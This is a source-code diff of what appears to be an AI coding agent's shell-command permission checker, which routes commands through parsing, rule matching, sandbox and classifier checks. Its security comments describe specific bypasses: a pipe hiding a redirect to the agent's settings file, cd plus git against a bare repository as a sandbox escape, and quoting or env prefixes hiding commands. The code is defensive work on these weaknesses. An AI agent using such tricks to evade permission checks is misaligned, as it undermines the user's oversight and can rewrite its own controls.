+ // fall through to ask if no deny matched — don't downgrade deny to ask.
1746
+ const earlyExit = checkEarlyExitDeny(input, appState.toolPermissionContext)
1747
+ if (earlyExit !== null) return earlyExit
1748
+ const decisionReason: PermissionDecisionReason = {
1749
+ type: 'other' as const,
1750
+ reason: astResult.reason,
1751
+ }
1752
+ logEvent('tengu_bash_ast_too_complex', {
1753
+ nodeTypeId: nodeTypeId(astResult.nodeType),
1754
+ })
1755
+ return {
1756
+ behavior: 'ask',
1757
+ decisionReason,
1758
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1759
+ suggestions: [],
1760
+ ...(feature('BASH_CLASSIFIER')
1761
+ ? {
1762
+ pendingClassifierCheck: buildPendingClassifierCheck(
1763
+ input.command,
1764
+ appState.toolPermissionContext,
1765
+ ),
1766
+ }
1767
+ : {}),
1768
+ }
1769
+ }
1770
+
1771
+ if (astResult.kind === 'simple') {
1772
+ // Clean parse: check semantic-level concerns (zsh builtins, eval, etc.)
1773
+ // that tokenize fine but are dangerous by name.
1774
+ const sem = checkSemantics(astResult.commands)
1775
+ if (!sem.ok) {
1776
+ // Same deny-rule enforcement as the too-complex path: a user with
1777
+ // `Bash(eval:*)` deny expects `eval "rm"` blocked, not downgraded.
1778
+ const earlyExit = checkSemanticsDeny(
1779
+ input,
1780
+ appState.toolPermissionContext,
1781
+ astResult.commands,
1782
+ )
1783
+ if (earlyExit !== null) return earlyExit
1784
+ const decisionReason: PermissionDecisionReason = {
1785
+ type: 'other' as const,
1786
+ reason: sem.reason,
1787
+ }
1788
+ return {
1789
+ behavior: 'ask',
1790
+ decisionReason,
1791
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1792
+ suggestions: [],
1793
+ }
1794
+ }
1795
+ // Stash the tokenized subcommands for use below. Downstream code (rule
1796
+ // matching, path extraction, cd detection) still operates on strings, so
1797
+ // we pass the original source span for each SimpleCommand. Downstream
1798
+ // processing (stripSafeWrappers, parseCommandArguments) re-tokenizes
1799
+ // these spans — that re-tokenization has known bugs (stripCommentLines
1800
+ // mishandles newlines inside quotes), but checkSemantics already caught
1801
+ // any argv element containing a newline, so those bugs can't bite here.
1802
+ // Migrating downstream to operate on argv directly is a later commit.
1803
+ astSubcommands = astResult.commands.map(c => c.text)
1804
+ astRedirects = astResult.commands.flatMap(c => c.redirects)
1805
+ astCommands = astResult.commands
1806
+ }
1807
+
1808
+ // Legacy shell-quote pre-check. Only reached on 'parse-unavailable'
1809
+ // (tree-sitter not loaded OR TREE_SITTER_BASH feature gated off). Falls
1810
+ // through to the full legacy path below.
1811
+ if (astResult.kind === 'parse-unavailable') {
1812
+ logForDebugging(
1813
+ 'bashToolHasPermission: tree-sitter unavailable, using legacy shell-quote path',
1814
+ )
1815
+ const parseResult = tryParseShellCommand(input.command)
1816
+ if (!parseResult.success) {
1817
+ const decisionReason = {
1818
+ type: 'other' as const,
1819
+ reason: `Command contains malformed syntax that cannot be parsed: ${parseResult.error}`,
1820
+ }
1821
+ return {
1822
+ behavior: 'ask',
1823
+ decisionReason,
1824
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1825
+ }
1826
+ }
1827
+ }
1828
+
1829
+ // Check sandbox auto-allow (which respects explicit deny/ask rules)
1830
+ // Only call this if sandboxing and auto-allow are both enabled
1831
+ if (
1832
+ SandboxManager.isSandboxingEnabled() &&
1833
+ SandboxManager.isAutoAllowBashIfSandboxedEnabled() &&
1834
+ shouldUseSandbox(input)
1835
+ ) {
1836
+ const sandboxAutoAllowResult = checkSandboxAutoAllow(
1837
+ input,
1838
+ appState.toolPermissionContext,
1839
+ )
1840
+ if (sandboxAutoAllowResult.behavior !== 'passthrough') {
1841
+ return sandboxAutoAllowResult
1842
+ }
1843
+ }
1844
+
1845
+ // Check exact match first
1846
+ const exactMatchResult = bashToolCheckExactMatchPermission(
1847
+ input,
1848
+ appState.toolPermissionContext,
1849
+ )
1850
+
1851
+ // Exact command was denied
1852
+ if (exactMatchResult.behavior === 'deny') {
1853
+ return exactMatchResult
1854
+ }
1855
+
1856
+ // Check Bash prompt deny and ask rules in parallel (both use Haiku).
1857
+ // Deny takes precedence over ask, and both take precedence over allow rules.
1858
+ // Skip when in auto mode - auto mode classifier handles all permission decisions
1859
+ if (
1860
+ isClassifierPermissionsEnabled() &&
1861
+ !(
1862
+ feature('TRANSCRIPT_CLASSIFIER') &&
1863
+ appState.toolPermissionContext.mode === 'auto'
1864
+ )
1865
+ ) {
1866
+ const denyDescriptions = getBashPromptDenyDescriptions(
1867
+ appState.toolPermissionContext,
1868
+ )
1869
+ const askDescriptions = getBashPromptAskDescriptions(
1870
+ appState.toolPermissionContext,
1871
+ )
1872
+ const hasDeny = denyDescriptions.length > 0
1873
+ const hasAsk = askDescriptions.length > 0
1874
+
1875
+ if (hasDeny || hasAsk) {
1876
+ const [denyResult, askResult] = await Promise.all([
1877
+ hasDeny
1878
+ ? classifyBashCommand(
1879
+ input.command,
1880
+ getCwd(),
1881
+ denyDescriptions,
1882
+ 'deny',
1883
+ context.abortController.signal,
1884
+ context.options.isNonInteractiveSession,
1885
+ )
1886
+ : null,
1887
+ hasAsk
1888
+ ? classifyBashCommand(
1889
+ input.command,
1890
+ getCwd(),
1891
+ askDescriptions,
1892
+ 'ask',
1893
+ context.abortController.signal,
1894
+ context.options.isNonInteractiveSession,
1895
+ )
1896
+ : null,
1897
+ ])
1898
+
1899
+ if (context.abortController.signal.aborted) {
1900
+ throw new AbortError()
1901
+ }
1902
+
1903
+ if (denyResult) {
1904
+ logClassifierResultForAnts(
1905
+ input.command,
1906
+ 'deny',
1907
+ denyDescriptions,
1908
+ denyResult,
1909
+ )
1910
+ }
1911
+ if (askResult) {
1912
+ logClassifierResultForAnts(
1913
+ input.command,
1914
+ 'ask',
1915
+ askDescriptions,
1916
+ askResult,
1917
+ )
1918
+ }
1919
+
1920
+ // Deny takes precedence
1921
+ if (denyResult?.matches && denyResult.confidence === 'high') {
1922
+ return {
1923
+ behavior: 'deny',
1924
+ message: `Denied by Bash prompt rule: "${denyResult.matchedDescription}"`,
1925
+ decisionReason: {
1926
+ type: 'other',
1927
+ reason: `Denied by Bash prompt rule: "${denyResult.matchedDescription}"`,
1928
+ },
1929
+ }
1930
+ }
1931
+
1932
+ if (askResult?.matches && askResult.confidence === 'high') {
1933
+ // Skip the Haiku call — the UI computes the prefix locally
1934
+ // and lets the user edit it. Still call the injected function
1935
+ // when tests override it.
1936
+ let suggestions: PermissionUpdate[]
1937
+ if (getCommandSubcommandPrefixFn === getCommandSubcommandPrefix) {
1938
+ suggestions = suggestionForExactCommand(input.command)
1939
+ } else {
1940
+ const commandPrefixResult = await getCommandSubcommandPrefixFn(
1941
+ input.command,
1942
+ context.abortController.signal,
1943
+ context.options.isNonInteractiveSession,
1944
+ )
1945
+ if (context.abortController.signal.aborted) {
1946
+ throw new AbortError()
1947
+ }
1948
+ suggestions = commandPrefixResult?.commandPrefix
1949
+ ? suggestionForPrefix(commandPrefixResult.commandPrefix)
1950
+ : suggestionForExactCommand(input.command)
1951
+ }
1952
+ return {
1953
+ behavior: 'ask',
1954
+ message: createPermissionRequestMessage(BashTool.name),
1955
+ decisionReason: {
1956
+ type: 'other',
1957
+ reason: `Required by Bash prompt rule: "${askResult.matchedDescription}"`,
1958
+ },
1959
+ suggestions,
1960
+ ...(feature('BASH_CLASSIFIER')
1961
+ ? {
1962
+ pendingClassifierCheck: buildPendingClassifierCheck(
1963
+ input.command,
1964
+ appState.toolPermissionContext,
1965
+ ),
1966
+ }
1967
+ : {}),
1968
+ }
1969
+ }
1970
+ }
1971
+ }
1972
+
1973
+ // Check for non-subcommand Bash operators like `>`, `|`, etc.
1974
+ // This must happen before dangerous path checks so that piped commands
1975
+ // are handled by the operator logic (which generates "multiple operations" messages)
1976
+ const commandOperatorResult = await checkCommandOperatorPermissions(
1977
+ input,
1978
+ (i: z.infer<typeof BashTool.inputSchema>) =>
1979
+ bashToolHasPermission(i, context, getCommandSubcommandPrefixFn),
1980
+ { isNormalizedCdCommand, isNormalizedGitCommand },
1981
+ astRoot,
1982
+ )
1983
+ if (commandOperatorResult.behavior !== 'passthrough') {
1984
+ // SECURITY FIX: When pipe segment processing returns 'allow', we must still validate
1985
+ // the ORIGINAL command. The pipe segment processing strips redirections before
1986
+ // checking each segment, so commands like:
1987
+ // echo 'x' | xargs printf '%s' >> /tmp/file
1988
+ // would have both segments allowed (echo and xargs printf) but the >> redirection
1989
+ // would bypass validation. We must check:
1990
+ // 1. Path constraints for output redirections
1991
+ // 2. Command safety for dangerous patterns (backticks, etc.) in redirect targets
1992
+ if (commandOperatorResult.behavior === 'allow') {
1993
+ // Check for dangerous patterns (backticks, $(), etc.) in the original command
1994
+ // This catches cases like: echo x | xargs echo > `pwd`/evil.txt
1995
+ // where the backtick is in the redirect target (stripped from segments)
1996
+ // Gate on AST: when astSubcommands is non-null, tree-sitter already
1997
+ // validated structure (backticks/$() in redirect targets would have
1998
+ // returned too-complex). Matches gating at ~1481, ~1706, ~1755.
1999
+ // Avoids FP: `find -exec {} \; | grep x` tripping on backslash-;.
2000
+ // bashCommandIsSafe runs the full legacy regex battery (~20 patterns) —
2001
+ // only call it when we'll actually use the result.
2002
+ const safetyResult =
2003
+ astSubcommands === null
2004
+ ? await bashCommandIsSafeAsync(input.command)
2005
+ : null
2006
+ if (
2007
+ safetyResult !== null &&
2008
+ safetyResult.behavior !== 'passthrough' &&
2009
+ safetyResult.behavior !== 'allow'
2010
+ ) {
2011
+ // Attach pending classifier check - may auto-approve before user responds
2012
+ appState = context.getAppState()
2013
+ return {
2014
+ behavior: 'ask',
2015
+ message: createPermissionRequestMessage(BashTool.name, {
2016
+ type: 'other',
2017
+ reason:
2018
+ safetyResult.message ??
2019
+ 'Command contains patterns that require approval',
2020
+ }),
2021
+ decisionReason: {
2022
+ type: 'other',
2023
+ reason:
2024
+ safetyResult.message ??
2025
+ 'Command contains patterns that require approval',
2026
+ },
2027
+ ...(feature('BASH_CLASSIFIER')
2028
+ ? {
2029
+ pendingClassifierCheck: buildPendingClassifierCheck(
2030
+ input.command,
2031
+ appState.toolPermissionContext,
2032
+ ),
2033
+ }
2034
+ : {}),
2035
+ }
2036
+ }
2037
+
2038
+ appState = context.getAppState()
2039
+ // SECURITY: Compute compoundCommandHasCd from the full command, NOT
2040
+ // hardcode false. The pipe-handling path previously passed `false` here,
2041
+ // disabling the cd+redirect check at pathValidation.ts:821. Appending
2042
+ // `| echo done` to `cd .claude && echo x > settings.json` routed through
2043
+ // this path with compoundCommandHasCd=false, letting the redirect write
2044
+ // to .claude/settings.json without the cd+redirect block firing.
2045
+ const pathResult = checkPathConstraints(
2046
+ input,
2047
+ getCwd(),
2048
+ appState.toolPermissionContext,
2049
+ commandHasAnyCd(input.command),
2050
+ astRedirects,
2051
+ astCommands,
2052
+ )
2053
+ if (pathResult.behavior !== 'passthrough') {
2054
+ return pathResult
2055
+ }
2056
+ }
2057
+
2058
+ // When pipe segments return 'ask' (individual segments not allowed by rules),
2059
+ // attach pending classifier check - may auto-approve before user responds.
2060
+ if (commandOperatorResult.behavior === 'ask') {
2061
+ appState = context.getAppState()
2062
+ return {
2063
+ ...commandOperatorResult,
2064
+ ...(feature('BASH_CLASSIFIER')
2065
+ ? {
2066
+ pendingClassifierCheck: buildPendingClassifierCheck(
2067
+ input.command,
2068
+ appState.toolPermissionContext,
2069
+ ),
2070
+ }
2071
+ : {}),
2072
+ }
2073
+ }
2074
+
2075
+ return commandOperatorResult
2076
+ }
2077
+
2078
+ // SECURITY: Legacy misparsing gate. Only runs when the tree-sitter module
2079
+ // is not loaded. Timeout/abort is fail-closed via too-complex (returned
2080
+ // early above), not routed here. When the AST parse succeeded,
2081
+ // astSubcommands is non-null and we've already validated structure; this
2082
+ // block is skipped entirely. The AST's 'too-complex' result subsumes
2083
+ // everything isBashSecurityCheckForMisparsing covered — both answer the
2084
+ // same question: "can splitCommand be trusted on this input?"
2085
+ if (
2086
+ astSubcommands === null &&
2087
+ !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)
2088
+ ) {
2089
+ const originalCommandSafetyResult = await bashCommandIsSafeAsync(
2090
+ input.command,
2091
+ )
2092
+ if (
2093
+ originalCommandSafetyResult.behavior === 'ask' &&
2094
+ originalCommandSafetyResult.isBashSecurityCheckForMisparsing
2095
+ ) {
2096
+ // Compound commands with safe heredoc patterns ($(cat <<'EOF'...EOF))
2097
+ // trigger the $() check on the unsplit command. Strip the safe heredocs
2098
+ // and re-check the remainder — if other misparsing patterns exist
2099
+ // (e.g. backslash-escaped operators), they must still block.
2100
+ const remainder = stripSafeHeredocSubstitutions(input.command)
2101
+ const remainderResult =
2102
+ remainder !== null ? await bashCommandIsSafeAsync(remainder) : null
2103
+ if (
2104
+ remainder === null ||
2105
+ (remainderResult?.behavior === 'ask' &&
2106
+ remainderResult.isBashSecurityCheckForMisparsing)
2107
+ ) {
2108
+ // Allow if the exact command has an explicit allow permission — the user
2109
+ // made a conscious choice to permit this specific command.
2110
+ appState = context.getAppState()
2111
+ const exactMatchResult = bashToolCheckExactMatchPermission(
2112
+ input,
2113
+ appState.toolPermissionContext,
2114
+ )
2115
+ if (exactMatchResult.behavior === 'allow') {
2116
+ return exactMatchResult
2117
+ }
2118
+ // Attach pending classifier check - may auto-approve before user responds
2119
+ const decisionReason: PermissionDecisionReason = {
2120
+ type: 'other' as const,
2121
+ reason: originalCommandSafetyResult.message,
2122
+ }
2123
+ return {
2124
+ behavior: 'ask',
2125
+ message: createPermissionRequestMessage(
2126
+ BashTool.name,
2127
+ decisionReason,
2128
+ ),
2129
+ decisionReason,
2130
+ suggestions: [], // Don't suggest saving a potentially dangerous command
2131
+ ...(feature('BASH_CLASSIFIER')
2132
+ ? {
2133
+ pendingClassifierCheck: buildPendingClassifierCheck(
2134
+ input.command,
2135
+ appState.toolPermissionContext,
2136
+ ),
2137
+ }
2138
+ : {}),
2139
+ }
2140
+ }
2141
+ }
2142
+ }
2143
+
2144
+ // Split into subcommands. Prefer the AST-extracted spans; fall back to
2145
+ // splitCommand only when tree-sitter was unavailable. The cd-cwd filter
2146
+ // strips the `cd ${cwd}` prefix that models like to prepend.
2147
+ const cwd = getCwd()
2148
+ const cwdMingw =
2149
+ getPlatform() === 'windows' ? windowsPathToPosixPath(cwd) : cwd
2150
+ const rawSubcommands =
2151
+ astSubcommands ?? shadowLegacySubs ?? splitCommand(input.command)
2152
+ const { subcommands, astCommandsByIdx } = filterCdCwdSubcommands(
2153
+ rawSubcommands,
2154
+ astCommands,
2155
+ cwd,
2156
+ cwdMingw,
2157
+ )
2158
+
2159
+ // CC-643: Cap subcommand fanout. Only the legacy splitCommand path can
2160
+ // explode — the AST path returns a bounded list (astSubcommands !== null)
2161
+ // or short-circuits to 'too-complex' for structures it can't represent.
2162
+ if (
2163
+ astSubcommands === null &&
2164
+ subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK
2165
+ ) {
2166
+ logForDebugging(
2167
+ `bashPermissions: ${subcommands.length} subcommands exceeds cap (${MAX_SUBCOMMANDS_FOR_SECURITY_CHECK}) — returning ask`,
2168
+ { level: 'debug' },
2169
+ )
2170
+ const decisionReason = {
2171
+ type: 'other' as const,
2172
+ reason: `Command splits into ${subcommands.length} subcommands, too many to safety-check individually`,
2173
+ }
2174
+ return {
2175
+ behavior: 'ask',
2176
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
2177
+ decisionReason,
2178
+ }
2179
+ }
2180
+
2181
+ // Ask if there are multiple `cd` commands
2182
+ const cdCommands = subcommands.filter(subCommand =>
2183
+ isNormalizedCdCommand(subCommand),
2184
+ )
2185
+ if (cdCommands.length > 1) {
2186
+ const decisionReason = {
2187
+ type: 'other' as const,
2188
+ reason:
2189
+ 'Multiple directory changes in one command require approval for clarity',
2190
+ }
2191
+ return {
2192
+ behavior: 'ask',
2193
+ decisionReason,
2194
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
2195
+ }
2196
+ }
2197
+
2198
+ // Track if compound command contains cd for security validation
2199
+ // This prevents bypassing path checks via: cd .claude/ && mv test.txt settings.json
2200
+ const compoundCommandHasCd = cdCommands.length > 0
2201
+
2202
+ // SECURITY: Block compound commands that have both cd AND git
2203
+ // This prevents sandbox escape via: cd /malicious/dir && git status
2204
+ // where the malicious directory contains a bare git repo with core.fsmonitor.
2205
+ // This check must happen HERE (before subcommand-level permission checks)
2206
+ // because bashToolCheckPermission checks each subcommand independently via
2207
+ // BashTool.isReadOnly(), which would re-derive compoundCommandHasCd=false
2208
+ // from just "git status" alone, bypassing the readOnlyValidation.ts check.
2209
+ if (compoundCommandHasCd) {
2210
+ const hasGitCommand = subcommands.some(cmd =>
2211
+ isNormalizedGitCommand(cmd.trim()),
2212
+ )
2213
+ if (hasGitCommand) {
2214
+ const decisionReason = {
2215
+ type: 'other' as const,
2216
+ reason:
2217
+ 'Compound commands with cd and git require approval to prevent bare repository attacks',
2218
+ }
2219
+ return {
2220
+ behavior: 'ask',
2221
+ decisionReason,
2222
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
2223
+ }
2224
+ }
2225
+ }
2226
+
2227
+ appState = context.getAppState() // re-compute the latest in case the user hit shift+tab
2228
+
2229
+ // SECURITY FIX: Check Bash deny/ask rules BEFORE path constraints
2230
+ // This ensures that explicit deny rules like Bash(ls:*) take precedence over
2231
+ // path constraint checks that return 'ask' for paths outside the project.
2232
+ // Without this ordering, absolute paths outside the project (e.g., ls /home)
2233
+ // would bypass deny rules because checkPathConstraints would return 'ask' first.
2234
+ //
2235
+ // Note: bashToolCheckPermission calls checkPathConstraints internally, which handles
2236
+ // output redirection validation on each subcommand. However, since splitCommand strips
2237
+ // redirections before we get here, we MUST validate output redirections on the ORIGINAL
2238
+ // command AFTER checking deny rules but BEFORE returning results.
2239
+ const subcommandPermissionDecisions = subcommands.map((command, i) =>
2240
+ bashToolCheckPermission(
2241
+ { command },
2242
+ appState.toolPermissionContext,
2243
+ compoundCommandHasCd,
2244
+ astCommandsByIdx[i],
2245
+ ),
2246
+ )
2247
+
2248
+ // Deny if any subcommands are denied
2249
+ const deniedSubresult = subcommandPermissionDecisions.find(
2250
+ _ => _.behavior === 'deny',
2251
+ )
2252
+ if (deniedSubresult !== undefined) {
2253
+ return {
2254
+ behavior: 'deny',
2255
+ message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
2256
+ decisionReason: {
2257
+ type: 'subcommandResults',
2258
+ reasons: new Map(
2259
+ subcommandPermissionDecisions.map((result, i) => [
2260
+ subcommands[i]!,
2261
+ result,
2262
+ ]),
2263
+ ),
2264
+ },
2265
+ }
2266
+ }
2267
+
2268
+ // Validate output redirections on the ORIGINAL command (before splitCommand stripped them)
2269
+ // This must happen AFTER checking deny rules but BEFORE returning results.
2270
+ // Output redirections like "> /etc/passwd" are stripped by splitCommand, so the per-subcommand
2271
+ // checkPathConstraints calls won't see them. We validate them here on the original input.
2272
+ // SECURITY: When AST data is available, pass AST-derived redirects so
2273
+ // checkPathConstraints uses them directly instead of re-parsing with
2274
+ // shell-quote (which has a known single-quote backslash misparsing bug
2275
+ // that can silently hide redirect operators).
2276
+ const pathResult = checkPathConstraints(
2277
+ input,
2278
+ getCwd(),
2279
+ appState.toolPermissionContext,
2280
+ compoundCommandHasCd,
2281
+ astRedirects,
2282
+ astCommands,
2283
+ )
2284
+ if (pathResult.behavior === 'deny') {
2285
+ return pathResult
2286
+ }
2287
+
2288
+ const askSubresult = subcommandPermissionDecisions.find(
2289
+ _ => _.behavior === 'ask',
2290
+ )
2291
+ const nonAllowCount = count(
2292
+ subcommandPermissionDecisions,
2293
+ _ => _.behavior !== 'allow',
2294
+ )
2295
+
2296
+ // SECURITY (GH#28784): Only short-circuit on a path-constraint 'ask' when no
2297
+ // subcommand independently produced an 'ask'. checkPathConstraints re-runs the
2298
+ // path-command loop on the full input, so `cd <outside-project> && python3 foo.py`
2299
+ // produces an ask with ONLY a Read(<dir>/**) suggestion — the UI renders it as
2300
+ // "Yes, allow reading from <dir>/" and picking that option silently approves
2301
+ // python3. When a subcommand has its own ask (e.g. the cd subcommand's own
2302
+ // path-constraint ask), fall through: either the askSubresult short-circuit
2303
+ // below fires (single non-allow subcommand) or the merge flow collects Bash
2304
+ // rule suggestions for every non-allow subcommand. The per-subcommand
2305
+ // checkPathConstraints call inside bashToolCheckPermission already captures
2306
+ // the Read rule for the cd target in that path.
2307
+ //
2308
+ // When no subcommand asked (all allow, or all passthrough like `printf > file`),
2309
+ // pathResult IS the only ask — return it so redirection checks surface.
2310
+ if (pathResult.behavior === 'ask' && askSubresult === undefined) {
2311
+ return pathResult
2312
+ }
2313
+
2314
+ // Ask if any subcommands require approval (e.g., ls/cd outside boundaries).
2315
+ // Only short-circuit when exactly ONE subcommand needs approval — if multiple
2316
+ // do (e.g. cd-outside-project ask + python3 passthrough), fall through to the
2317
+ // merge flow so the prompt surfaces Bash rule suggestions for all of them
2318
+ // instead of only the first ask's Read rule (GH#28784).
2319
+ if (askSubresult !== undefined && nonAllowCount === 1) {
2320
+ return {
2321
+ ...askSubresult,
2322
+ ...(feature('BASH_CLASSIFIER')
2323
+ ? {
2324
+ pendingClassifierCheck: buildPendingClassifierCheck(
2325
+ input.command,
2326
+ appState.toolPermissionContext,
2327
+ ),
2328
+ }
2329
+ : {}),
2330
+ }
2331
+ }
2332
+
2333
+ // Allow if exact command was allowed
2334
+ if (exactMatchResult.behavior === 'allow') {
2335
+ return exactMatchResult
2336
+ }
2337
+
2338
+ // If all subcommands are allowed via exact or prefix match, allow the
2339
+ // command — but only if no command injection is possible. When the AST
2340
+ // parse succeeded, each subcommand is already known-safe (no hidden
2341
+ // substitutions, no structural tricks); the per-subcommand re-check is
2342
+ // redundant. When on the legacy path, re-run bashCommandIsSafeAsync per sub.
2343
+ let hasPossibleCommandInjection = false
2344
+ if (
2345
+ astSubcommands === null &&
2346
+ !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)
2347
+ ) {
2348
+ // CC-643: Batch divergence telemetry into a single logEvent. The per-sub
2349
+ // logEvent was the hot-path syscall driver (each call → /proc/self/stat
2350
+ // via process.memoryUsage()). Aggregate count preserves the signal.
2351
+ let divergenceCount = 0
2352
+ const onDivergence = () => {
2353
+ divergenceCount++
2354
+ }
2355
+ const results = await Promise.all(
2356
+ subcommands.map(c => bashCommandIsSafeAsync(c, onDivergence)),
2357
+ )
2358
+ hasPossibleCommandInjection = results.some(
2359
+ r => r.behavior !== 'passthrough',
2360
+ )
2361
+ if (divergenceCount > 0) {
2362
+ logEvent('tengu_tree_sitter_security_divergence', {
2363
+ quoteContextDivergence: true,
2364
+ count: divergenceCount,
2365
+ })
2366
+ }
2367
+ }
2368
+ if (
2369
+ subcommandPermissionDecisions.every(_ => _.behavior === 'allow') &&
2370
+ !hasPossibleCommandInjection
2371
+ ) {
2372
+ return {
2373
+ behavior: 'allow',
2374
+ updatedInput: input,
2375
+ decisionReason: {
2376
+ type: 'subcommandResults',
2377
+ reasons: new Map(
2378
+ subcommandPermissionDecisions.map((result, i) => [
2379
+ subcommands[i]!,
2380
+ result,
2381
+ ]),
2382
+ ),
2383
+ },
2384
+ }
2385
+ }
2386
+
2387
+ // Query Haiku for command prefixes
2388
+ // Skip the Haiku call — the UI computes the prefix locally and
2389
+ // lets the user edit it. Still call when a custom fn is injected (tests).
2390
+ let commandSubcommandPrefix: Awaited<
2391
+ ReturnType<typeof getCommandSubcommandPrefixFn>
2392
+ > = null
2393
+ if (getCommandSubcommandPrefixFn !== getCommandSubcommandPrefix) {
2394
+ commandSubcommandPrefix = await getCommandSubcommandPrefixFn(
2395
+ input.command,
2396
+ context.abortController.signal,
2397
+ context.options.isNonInteractiveSession,
2398
+ )
2399
+ if (context.abortController.signal.aborted) {
2400
+ throw new AbortError()
2401
+ }
2402
+ }
2403
+
2404
+ // If there is only one command, no need to process subcommands
2405
+ appState = context.getAppState() // re-compute the latest in case the user hit shift+tab
2406
+ if (subcommands.length === 1) {
2407
+ const result = await checkCommandAndSuggestRules(
2408
+ { command: subcommands[0]! },
2409
+ appState.toolPermissionContext,
2410
+ commandSubcommandPrefix,
2411
+ compoundCommandHasCd,
2412
+ astSubcommands !== null,
2413
+ )
2414
+ // If command wasn't allowed, attach pending classifier check.
2415
+ // At this point, 'ask' can only come from bashCommandIsSafe (security check inside
2416
+ // checkCommandAndSuggestRules), NOT from explicit ask rules - those were already
2417
+ // filtered out at step 13 (askSubresult check). The classifier can bypass security.
2418
+ if (result.behavior === 'ask' || result.behavior === 'passthrough') {
2419
+ return {
2420
+ ...result,
2421
+ ...(feature('BASH_CLASSIFIER')
2422
+ ? {
2423
+ pendingClassifierCheck: buildPendingClassifierCheck(
2424
+ input.command,
2425
+ appState.toolPermissionContext,
2426
+ ),
2427
+ }
2428
+ : {}),
2429
+ }
2430
+ }
2431
+ return result
2432
+ }
2433
+
2434
+ // Check subcommand permission results
2435
+ const subcommandResults: Map<string, PermissionResult> = new Map()
2436
+ for (const subcommand of subcommands) {
2437
+ subcommandResults.set(
2438
+ subcommand,
2439
+ await checkCommandAndSuggestRules(
2440
+ {
2441
+ // Pass through input params like `sandbox`
2442
+ ...input,
2443
+ command: subcommand,
2444
+ },
2445
+ appState.toolPermissionContext,
2446
+ commandSubcommandPrefix?.subcommandPrefixes.get(subcommand),
2447
+ compoundCommandHasCd,
2448
+ astSubcommands !== null,
2449
+ ),
2450
+ )
2451
+ }
2452
+
2453
+ // Allow if all subcommands are allowed
2454
+ // Note that this is different than 6b because we are checking the command injection results.
2455
+ if (
2456
+ subcommands.every(subcommand => {
2457
+ const permissionResult = subcommandResults.get(subcommand)
2458
+ return permissionResult?.behavior === 'allow'
2459
+ })
2460
+ ) {
2461
+ // Keep subcommandResults as PermissionResult for decisionReason
2462
+ return {
2463
+ behavior: 'allow',
2464
+ updatedInput: input,
2465
+ decisionReason: {
2466
+ type: 'subcommandResults',
2467
+ reasons: subcommandResults,
2468
+ },
2469
+ }
2470
+ }
2471
+
2472
+ // Otherwise, ask for permission
2473
+ const collectedRules: Map<string, PermissionRuleValue> = new Map()
2474
+
2475
+ for (const [subcommand, permissionResult] of subcommandResults) {
2476
+ if (
2477
+ permissionResult.behavior === 'ask' ||
2478
+ permissionResult.behavior === 'passthrough'
2479
+ ) {
2480
+ const updates =
2481
+ 'suggestions' in permissionResult
2482
+ ? permissionResult.suggestions
2483
+ : undefined
2484
+
2485
+ const rules = extractRules(updates)
2486
+ for (const rule of rules) {
2487
+ // Use string representation as key for deduplication
2488
+ const ruleKey = permissionRuleValueToString(rule)
2489
+ collectedRules.set(ruleKey, rule)
2490
+ }
2491
+
2492
+ // GH#28784 follow-up: security-check asks (compound-cd+write, process
2493
+ // substitution, etc.) carry no suggestions. In a compound command like
2494
+ // `cd ~/out && rm -rf x`, that means only cd's Read rule gets collected
2495
+ // and the UI labels the prompt "Yes, allow reading from <dir>/" — never
2496
+ // mentioning rm. Synthesize a Bash(exact) rule so the UI shows the
2497
+ // chained command. Skip explicit ask rules (decisionReason.type 'rule')
2498
+ // where the user deliberately wants to review each time.
2499
+ if (
2500
+ permissionResult.behavior === 'ask' &&
2501
+ rules.length === 0 &&
2502
+ permissionResult.decisionReason?.type !== 'rule'
2503
+ ) {
2504
+ for (const rule of extractRules(
2505
+ suggestionForExactCommand(subcommand),
2506
+ )) {
2507
+ const ruleKey = permissionRuleValueToString(rule)
2508
+ collectedRules.set(ruleKey, rule)
2509
+ }
2510
+ }
2511
+ // Note: We only collect rules, not other update types like mode changes
2512
+ // This is appropriate for bash subcommands which primarily need rule suggestions
2513
+ }
2514
+ }
2515
+
2516
+ const decisionReason = {
2517
+ type: 'subcommandResults' as const,
2518
+ reasons: subcommandResults,
2519
+ }
2520
+
2521
+ // GH#11380: Cap at MAX_SUGGESTED_RULES_FOR_COMPOUND. Map preserves insertion
2522
+ // order (subcommand order), so slicing keeps the leftmost N.
2523
+ const cappedRules = Array.from(collectedRules.values()).slice(
2524
+ 0,
2525
+ MAX_SUGGESTED_RULES_FOR_COMPOUND,
2526
+ )
2527
+ const suggestedUpdates: PermissionUpdate[] | undefined =
2528
+ cappedRules.length > 0
2529
+ ? [
2530
+ {
2531
+ type: 'addRules',
2532
+ rules: cappedRules,
2533
+ behavior: 'allow',
2534
+ destination: 'localSettings',
2535
+ },
2536
+ ]
2537
+ : undefined
2538
+
2539
+ // Attach pending classifier check - may auto-approve before user responds.
2540
+ // Behavior is 'ask' if any subcommand was 'ask' (e.g., path constraint or ask
2541
+ // rule) — before the GH#28784 fix, ask subresults always short-circuited above
2542
+ // so this path only saw 'passthrough' subcommands and hardcoded that.
2543
+ return {
2544
+ behavior: askSubresult !== undefined ? 'ask' : 'passthrough',
2545
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
2546
+ decisionReason,
2547
+ suggestions: suggestedUpdates,
2548
+ ...(feature('BASH_CLASSIFIER')
2549
+ ? {
2550
+ pendingClassifierCheck: buildPendingClassifierCheck(
2551
+ input.command,
2552
+ appState.toolPermissionContext,
2553
+ ),
2554
+ }
2555
+ : {}),
2556
+ }
2557
+ }
2558
+
2559
+ /**
2560
+ * Checks if a subcommand is a git command after normalizing away safe wrappers
2561
+ * (env vars, timeout, etc.) and shell quotes.
2562
+ *
2563
+ * SECURITY: Must normalize before matching to prevent bypasses like:
2564
+ * 'git' status — shell quotes hide the command from a naive regex
2565
+ * NO_COLOR=1 git status — env var prefix hides the command
2566
+ */
2567
+ export function isNormalizedGitCommand(command: string): boolean {
2568
+ // Fast path: catch the most common case before any parsing
2569
